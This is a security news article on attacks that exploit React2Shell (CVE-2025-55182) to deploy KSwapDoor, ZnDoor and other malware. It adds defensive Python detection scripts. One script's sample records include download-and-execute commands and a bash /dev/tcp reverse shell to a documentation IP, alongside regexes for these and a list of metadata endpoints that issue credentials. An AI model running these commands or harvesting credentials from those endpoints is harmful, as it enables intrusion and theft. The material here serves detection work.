A critical security vulnerability dubbed React2Shell is being actively exploited by various threat actors to deploy sophisticated malware, including KSwapDoor and ZnDoor. Cybersecurity researchers from Palo Alto Networks Unit 42 and NTT Security have detailed how this flaw, identified as CVE-2025-55182, is enabling attackers to gain unauthorized access and control over compromised systems, particularly impacting Linux environments.
The React2Shell vulnerability, which carries a CVSS score of 10.0, allows threat actors to execute arbitrary commands on target systems. This capability is being leveraged for extensive post-exploitation activities, including the establishment of reverse shells and the deployment of remote monitoring and management (RMM) tools. The exploitation chain often involves downloading and executing malicious payloads from remote servers, bypassing security measures through various evasion techniques.
React2Shell Exploitation: A Widespread Threat
The React2Shell vulnerability has become a significant concern in the cybersecurity landscape, with multiple threat actors actively weaponizing it to deliver a diverse range of payloads. Google has identified at least five China-nexus groups that are exploiting this flaw. These groups are using React2Shell to deploy tools such as MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, and ANGRYREBEL, highlighting the broad applicability and high impact of this vulnerability.
In one observed campaign, threat actors are using React2Shell to deliver KSwapDoor, a stealthy remote access tool engineered for covert operation. Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, described KSwapDoor as a tool that builds an internal mesh network, enabling compromised servers to communicate with each other and evade detection. It employs advanced encryption and a unique “sleeper” mode that allows attackers to bypass firewalls by activating the malware with an undetectable signal.
Additionally, NTT Security has reported that organizations in Japan are being targeted by attacks that leverage React2Shell to deploy ZnDoor, a malware family detected in the wild since December 2023. The attack typically begins with a bash command executed via wget to retrieve the malicious payload from a remote server and then run it.
Malware Capabilities and Evasion Tactics
The malware families being delivered through React2Shell exploits exhibit a range of advanced functionalities. KSwapDoor, for instance, impersonates a legitimate Linux kernel swap daemon to avoid detection and offers capabilities such as an interactive shell, command execution, file operations, and lateral movement scanning. This design makes it particularly challenging for security tooling to identify and neutralize.
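Because KSwapDoor hides behind the name of the kernel swap daemon, a useful host-level check is whether anything called kswapd is actually a kernel thread. Genuine kswapd instances are children of kthreadd (PID 2), have an empty /proc/PID/cmdline and no /proc/PID/exe target; a user-space binary that merely adopts the name fails at least one of those tests. The following Python script is an added example written for this article, not code from Unit 42, NTT Security or any cited vendor; the kernel-thread properties it relies on are general Linux behaviour, and the `ProcRecord` layout is an assumption made for the example.

```python
"""Heuristic check for user-space processes posing as the kernel swap daemon.

Real kswapd instances are kernel threads: their parent is kthreadd (PID 2),
/proc/<pid>/cmdline is empty and /proc/<pid>/exe has no target. A user-space
binary that merely renames itself "kswapd0" fails at least one of these tests.
These are assumptions about normal Linux behaviour, not a signature for any
specific malware sample.
"""
from dataclasses import dataclass
from pathlib import Path
import os
import re

KSWAPD_NAME = re.compile(r"^\[?kswapd\d*\]?$")  # "kswapd0", "[kswapd0]", "kswapd1", ...
KTHREADD_PID = 2


@dataclass
class ProcRecord:
    pid: int
    comm: str      # /proc/<pid>/comm (15-char thread name, attacker-controllable)
    ppid: int      # parent PID from /proc/<pid>/stat
    cmdline: str   # "" for kernel threads
    exe: str       # resolved /proc/<pid>/exe target, "" if absent or unreadable


def is_kswapd_impostor(rec: ProcRecord) -> bool:
    """True when a process uses the kswapd name but does not look like a kernel thread."""
    if not KSWAPD_NAME.match(rec.comm.strip()):
        return False
    kernel_thread_like = (
        rec.ppid == KTHREADD_PID and rec.cmdline == "" and rec.exe == ""
    )
    return not kernel_thread_like


def find_impostors(records):
    """Return the subset of records that fail the kernel-thread checks."""
    return [r for r in records if is_kswapd_impostor(r)]


def collect_proc(proc_root="/proc"):
    """Read live process records from procfs (Linux only).

    stat and cmdline are world-readable; exe of another user's process is
    not, which is why the decision also uses ppid and cmdline rather than
    exe alone.
    """
    records = []
    for entry in Path(proc_root).iterdir():
        if not entry.name.isdigit():
            continue
        try:
            stat = (entry / "stat").read_text()
            comm = stat[stat.index("(") + 1:stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])
            raw = (entry / "cmdline").read_bytes()
            cmdline = raw.replace(b"\0", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(entry / "exe")
            except OSError:
                exe = ""
        except (OSError, ValueError):
            continue  # process exited during the scan
        records.append(ProcRecord(int(entry.name), comm, ppid, cmdline, exe))
    return records


if __name__ == "__main__":
    for rec in find_impostors(collect_proc()):
        print(f"suspicious: pid={rec.pid} comm={rec.comm!r} ppid={rec.ppid} "
              f"exe={rec.exe!r} cmdline={rec.cmdline!r}")
```

Run it as any user on a Linux host; a hit means a process carries the kswapd name but has a user-space parent, a command line or an executable on disk, which is worth pulling into a forensic timeline. The three properties are deliberately checked together, since a process can clear its own argv, but it cannot make itself a child of kthreadd.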
ZnDoor, a remote access trojan, communicates with threat actor-controlled infrastructure to receive and execute commands. The commands supported by ZnDoor include executing shell commands, launching interactive shells, managing files and directories, gathering system information, and even initiating SOCKS5 proxy or port forwarding for further network intrusion. Some of the listed commands include `shell`, `interactive_shell`, `explorer`, `explorer_cat`, `explorer_delete`, `explorer_upload`, `explorer_download`, `system`, `change_timefile`, `socket_quick_startstreams`, `start_in_port_forward`, and `stop_in_port`.
Microsoft’s advisory on CVE-2025-55182 details how attackers are using the vulnerability to set up reverse shells, deploy RMM tools like MeshAgent, and modify system configurations to enable persistent access. The payloads observed in these attacks include VShell, EtherRAT, SNOWLIGHT, ShadowPad, and XMRig. Attackers are also employing Cloudflare Tunnel endpoints to conceal their malicious traffic and conducting thorough reconnaissance of compromised environments to facilitate credential theft and lateral movement within the network.
Furthermore, credential harvesting activities have been observed targeting cloud metadata services, including Azure Instance Metadata Service (IMDS), as well as endpoints for Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud. The ultimate goal is to obtain identity tokens for deeper infiltration into cloud infrastructures. Attackers are also deploying secret discovery tools like TruffleHog and Gitleaks, along with custom scripts, to extract sensitive information, including AI and cloud-native credentials such as OpenAI API keys, Databricks tokens, and Kubernetes service account credentials. Tools like Azure CLI were also used to obtain tokens.
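The credential-harvesting step above has a narrow network footprint: a request from the compromised web server process to the cloud metadata endpoint, often for an identity token or role credentials rather than for plain instance facts. The following Python triage script is an added example, not code from the article or from any of the vendors it cites. It reads a constructed newline-delimited JSON egress log (the field names `ts`, `pid`, `comm`, `dst`, `method` and `path` are assumptions; map your proxy, eBPF or firewall telemetry onto them), rates requests for credentials high and any other metadata access medium, and suppresses an assumed allowlist of agents that legitimately call the service.

```python
"""Flag processes reaching cloud instance-metadata services from egress telemetry.

Input records are constructed JSON lines with ts, pid, comm, dst, method and
path. The host list, credential paths and allowlist are assumptions to tune
per environment.
"""
import json

# Well-known metadata endpoints. 169.254.169.254 serves AWS, Azure and GCP;
# the Tencent Cloud hostname is taken from vendor documentation, check it
# against your provider's current docs before relying on it.
METADATA_HOSTS = {
    "169.254.169.254",
    "metadata.google.internal",
    "metadata.tencentyun.com",
}

# Paths that hand out credentials rather than plain instance facts.
CREDENTIAL_PATHS = (
    "/metadata/identity/oauth2/token",                # Azure IMDS managed identity
    "/latest/meta-data/iam/security-credentials",     # AWS IMDS role credentials
    "/latest/api/token",                              # AWS IMDSv2 session token
    "/computeMetadata/v1/instance/service-accounts",  # GCP service-account tokens
)

# Assumed baseline of agents that legitimately talk to IMDS on this host.
EXPECTED_CALLERS = {"waagent", "cloud-init", "google_guest_agent", "amazon-ssm-agent"}


def classify(record: dict):
    """Return an alert dict for a metadata request, or None if not interesting."""
    dst = record.get("dst", "").split(":")[0].lower()  # strip :port (IPv4/hostname only)
    if dst not in METADATA_HOSTS:
        return None
    if record.get("comm") in EXPECTED_CALLERS:
        return None
    path = record.get("path", "")
    wants_credentials = any(path.startswith(p) for p in CREDENTIAL_PATHS)
    return {
        "ts": record.get("ts"),
        "pid": record.get("pid"),
        "comm": record.get("comm"),
        "dst": dst,
        "path": path,
        "severity": "high" if wants_credentials else "medium",
        "reason": ("credential request to metadata service"
                   if wants_credentials else "unexpected metadata access"),
    }


def triage(lines):
    """Parse JSON lines and return alerts in input order; malformed lines are skipped."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = classify(record)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry, not captured from any real incident.
SAMPLE_LOG = """
{"ts":"2025-12-05T10:01:02Z","pid":2211,"comm":"node","dst":"169.254.169.254:80","method":"GET","path":"/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}
{"ts":"2025-12-05T10:01:03Z","pid":812,"comm":"waagent","dst":"169.254.169.254:80","method":"GET","path":"/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}
{"ts":"2025-12-05T10:01:09Z","pid":2211,"comm":"node","dst":"metadata.google.internal:80","method":"GET","path":"/computeMetadata/v1/project/project-id"}
{"ts":"2025-12-05T10:01:10Z","pid":2211,"comm":"node","dst":"203.0.113.9:443","method":"POST","path":"/api/upload"}
""".splitlines()

if __name__ == "__main__":
    for a in triage(SAMPLE_LOG):
        print(a["severity"], a["comm"], a["dst"], a["path"], "-", a["reason"])
```

On the sample, the Node.js worker's token request is rated high, the same request from the Azure agent is suppressed, the project-id lookup is medium, and the ordinary HTTPS call produces nothing. The mitigation that makes this signal strong is to keep the allowlist small: a web application server normally has no reason to call the metadata service at all, so when it does, the request itself is the finding.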
In a separate campaign, researchers detailed how flaws in Next.js, including the React2Shell vulnerability, are being exploited for systematic extraction of sensitive data. This includes environment variables, SSH keys, cloud credentials, Git credentials, command history, and critical system files like `/etc/shadow` and `/etc/passwd`. The malware then establishes persistence, installs a SOCKS5 proxy, and initiates a reverse shell to a command-and-control server, while also deploying a React scanner for further propagation.
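The post-exploitation chain described in this section and earlier (a shell launched from the web server process that fetches a payload with wget or curl and runs it, followed by a reverse shell, a SOCKS5 proxy, an RMM agent or a Cloudflare Tunnel) leaves distinctive process-creation records, and those records are where a defender can catch it before persistence is established. The following Python triage function is an added example, not code from the article or from the vendors it cites. It scores constructed auditd-style execve records flattened to JSON (the field names `parent_comm`, `comm` and `cmdline` and the `WEB_SERVER_PARENTS` baseline are assumptions to map onto your own EDR or auditd output) and reports a severity with the reasons behind it.

```python
"""Score process-creation records for the download-and-execute chain.

Input records are constructed JSON lines with parent_comm, comm and cmdline.
WEB_SERVER_PARENTS assumes a Node.js deployment of Next.js; adapt it to the
real process names of the service being protected.
"""
import json
import re

WEB_SERVER_PARENTS = {"node", "next-server", "npm"}      # assumed baseline
SHELLS = {"sh", "bash", "dash"}
STAGING_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# Fetch piped straight into an interpreter: wget ... | sh, curl ... | bash
PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|]*\|\s*(ba|z|da)?sh\b")
# Fetch, then chmod or execute in the same command string
EXEC_AFTER_FETCH = re.compile(
    r"\b(wget|curl)\b.*?(;|&&)\s*(chmod\s+\S*x\b|\./|/tmp/|/dev/shm/|/var/tmp/|sh\s|bash\s)"
)
# Shell-level network redirection used by reverse shells
DEV_TCP = re.compile(r"/dev/tcp/")
# Tunnelling and RMM agents named in the reporting
TUNNEL_OR_RMM = re.compile(r"\b(cloudflared|meshagent)\b", re.IGNORECASE)


def score(record: dict):
    """Return (points, reasons) for one execve record."""
    cmd = record.get("cmdline", "")
    points, reasons = 0, []
    fetches = re.search(r"\b(wget|curl)\b", cmd) is not None
    if record.get("parent_comm") in WEB_SERVER_PARENTS and record.get("comm") in SHELLS:
        points += 2
        reasons.append("shell spawned by web server process")
    if PIPE_TO_SHELL.search(cmd):
        points += 3
        reasons.append("download piped to shell")
    elif EXEC_AFTER_FETCH.search(cmd):
        points += 3
        reasons.append("download followed by execution")
    if fetches and any(d in cmd for d in STAGING_DIRS):
        points += 1
        reasons.append("payload staged in world-writable directory")
    if DEV_TCP.search(cmd):
        points += 4
        reasons.append("/dev/tcp redirection (reverse shell pattern)")
    if TUNNEL_OR_RMM.search(cmd):
        points += 2
        reasons.append("tunnel or RMM agent launched")
    return points, reasons


def severity(points: int) -> str:
    """Map a score to a severity band (thresholds are an assumption to tune)."""
    if points >= 4:
        return "high"
    if points >= 2:
        return "medium"
    return "none"


def triage(lines):
    """Return (severity, reasons, cmdline) for every record that scores at all."""
    out = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        points, reasons = score(record)
        if points:
            out.append((severity(points), reasons, record.get("cmdline", "")))
    return out


# Constructed sample records; 203.0.113.0/24 is a documentation address range.
SAMPLE = r'''
{"parent_comm":"node","comm":"sh","cmdline":"sh -c \"wget -q http://203.0.113.10/x.sh -O /tmp/x.sh; chmod +x /tmp/x.sh; /tmp/x.sh\""}
{"parent_comm":"bash","comm":"wget","cmdline":"wget https://example.org/file.tar.gz"}
{"parent_comm":"node","comm":"sh","cmdline":"sh -c \"curl -s http://203.0.113.10/i | sh\""}
{"parent_comm":"cron","comm":"sh","cmdline":"sh -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'"}
{"parent_comm":"systemd","comm":"cloudflared","cmdline":"cloudflared tunnel run"}
'''.splitlines()

if __name__ == "__main__":
    for sev, reasons, cmd in triage(SAMPLE):
        print(f"{sev:6} {'; '.join(reasons)} :: {cmd}")
```

The scoring is additive on purpose: a shell spawned by the Node.js process is already unusual, and combined with a fetch into /tmp followed by chmod and execution it reaches high on its own, while an interactive download by an administrator scores nothing. The cloudflared record shows the trade-off, since a legitimately deployed tunnel agent will score medium until it is added to a local baseline.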
Prevalence and Future Outlook
The Shadowserver Foundation is actively tracking over 111,000 IP addresses that are vulnerable to React2Shell attacks. The United States accounts for the largest share of these vulnerable IPs, followed by Germany, France, and India. Data from GreyNoise indicates significant malicious IP address activity from the U.S., India, the U.K., Singapore, and the Netherlands in the past 24 hours, underscoring the ongoing exploitation efforts.
Given the widespread exploitation and the critical nature of the React2Shell vulnerability, organizations are strongly advised to apply any available patches or security mitigations as soon as possible. Continuous monitoring for suspicious network activity and endpoint behavior, along with regular security audits, will be crucial in defending against these evolving threats. The sustained interest from multiple threat actor groups suggests that exploitation of React2Shell and the deployment of related malware will likely continue. Security vendors and researchers will continue to monitor for new variants and attack techniques emerging from this vulnerability.